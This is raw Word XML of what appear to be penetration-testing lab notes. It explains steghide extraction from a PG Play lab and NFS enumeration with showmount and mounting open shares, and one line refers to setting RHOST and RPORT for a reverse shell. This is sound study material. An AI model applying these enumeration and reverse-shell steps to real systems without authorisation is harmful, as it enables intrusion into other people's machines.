          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3746500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="328" name="image233.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image233.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId301"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3746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F08">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="658"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the RHOST and RPORT with the correct values for you. And remember that that RHOST is going to be your local IP! Not the target IP. Since this is a reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F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0B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_275oo99wfit5" w:id="419"/>
      <w:bookmarkEnd w:id="419"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1041">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">MoneyBox</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we saw an example of steganography. We were given an image which seemed useless, but then in the website source code, we were given a "secret key" which ended up being the key used to extract information from an image. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">steghide extract -sf fileName.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will send output to a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since steghide can be used for both encryption and decryption, we have to specify extraction by using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">extract </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-sf</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: This stands for "stego file", which is the file that may contain hidden data. It's the image (or audio) file that has potentially been embedded with hidden content.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F12">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F13">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F14">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F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16">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F17">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n6ntkoqtzkpm" w:id="420"/>
      <w:bookmarkEnd w:id="420"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F18">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F19">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More can be seen in Tib3rius NFS Video</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS (Network File System)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a protocol that allows systems to share directories and files over a network as if they were locally mounted on the client machine. It's commonly used in Linux and Unix environments to enable file sharing between servers and clients.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1D">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS has no protocol for authorization or authentication, making it a common pitfall for misconfiguration and therefore exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS (Network File System)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is closely related to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RPC (Remote Procedure Call)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> because NFS relies on RPC to function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F20">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F21">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How NFS Works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F22">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F23">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A server exports directories or file systems, specifying which clients can access them and with what permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exported directories are defined in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exports</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file (e.g., </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/exports</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on Linux).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Client-Side Access:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Clients can mount the shared directories over the network using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mount</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="929"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After mounting, files and directories in the shared directory appear as if they are part of the client's local file system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F28">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F29">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to Enumerate NFS:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">showmount -e [ip_address]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">showmount: A Linux command that queries an NFS server to retrieve information about its exports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e: This flag stands for "exports." It tells showmount to display the exported directories along with the client permission</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exported Directories: Directories or file systems that the NFS server is sharing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F2F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Allowed Clients: Specifies which systems or IPs are allowed to access those directories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F30">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2466975" cy="866775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="42" name="image40.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image40.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1042"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="24669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2F32">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1161"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see two globally accessible file-shares, as indicated by the star. We can have a look at their contents by mounting the directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F33">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo mount -t nfs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[path_to_file] </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002F35">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
